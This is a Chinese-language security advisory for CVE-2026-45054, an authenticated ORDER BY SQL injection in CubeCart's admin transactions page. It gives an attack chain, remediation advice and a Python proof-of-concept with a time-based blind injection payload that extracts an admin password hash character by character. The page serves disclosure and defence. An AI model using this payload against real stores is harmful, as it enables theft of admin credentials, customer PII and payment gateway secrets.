CVE-2026-45054 CVSS 4.9 中危

CVE-2026-45054 CubeCart SQL注入漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45054

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

CubeCart

漏洞概述

CubeCart 6.7.0之前的版本存在SQL注入漏洞。由于后台订单交易列表页面未对`sort`参数进行有效验证，导致经过认证的管理员可在ORDER BY子句中注入恶意SQL。攻击者可利用该漏洞执行任意SQL查询，窃取管理员密码哈希、客户PII及支付网关凭据等敏感信息。

技术细节

该漏洞位于管理员后台的`admin.php?_g=orders&node=transactions`页面。程序直接从`$_GET['sort']`数组获取数据并拼接到SQL语句的ORDER BY子句中，且未对列名和排序方向进行白名单校验。尽管框架使用了`sqlSafe()`（基于mysqli转义）进行过滤，但由于ORDER BY注入通常不需要引号包裹即可执行（如利用条件判断语句），导致过滤机制失效。拥有订单读取权限（`CC_PERM_READ`）的攻击者可以通过构造特定的盲注Payload，利用基于时间或布尔的技术，从数据库中提取敏感数据。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用CubeCart电子商务软件。

STEP 2

获取权限

攻击者通过钓鱼或弱口令获取一个具有CC_PERM_READ权限的 CubeCart 管理员账户。

STEP 3

发送请求

攻击者访问`admin.php?_g=orders&node=transactions`页面，并在GET参数中构造包含恶意SQL语句的`sort`数组。

STEP 4

执行注入

服务器将恶意参数拼接到SQL查询中并执行，由于未正确过滤，SQL注入成功触发。

STEP 5

数据窃取

攻击者利用盲注技术逐步提取管理员密码哈希、客户个人身份信息（PII）及支付网关凭证。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://example.com/admin.php"
params = {
    "_g": "orders",
    "node": "transactions",
    "sort[0]": "(CASE WHEN (SELECT SUBSTRING(password,1,1) FROM CubeCart_admin_users WHERE admin_id=1)='a' THEN (SELECT SLEEP(5)) ELSE 1 END)"
}
cookies = {
    "PHPSESSID": "authenticated_session_id_here"
}

response = requests.get(target_url, params=params, cookies=cookies)
if response.elapsed.total_seconds() > 5:
    print("Vulnerable: First character of hash is 'a'")
else:
    print("Not 'a'")

影响范围

CubeCart < 6.7.0

防御指南

临时缓解措施

建议立即升级至6.7.0或更高版本。如无法立即升级，应配置WAF规则以检测和拦截针对`admin.php`页面`sort`参数的异常请求（如包含SQL关键字、SLEEP函数等），并加强对后台管理员账户的监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表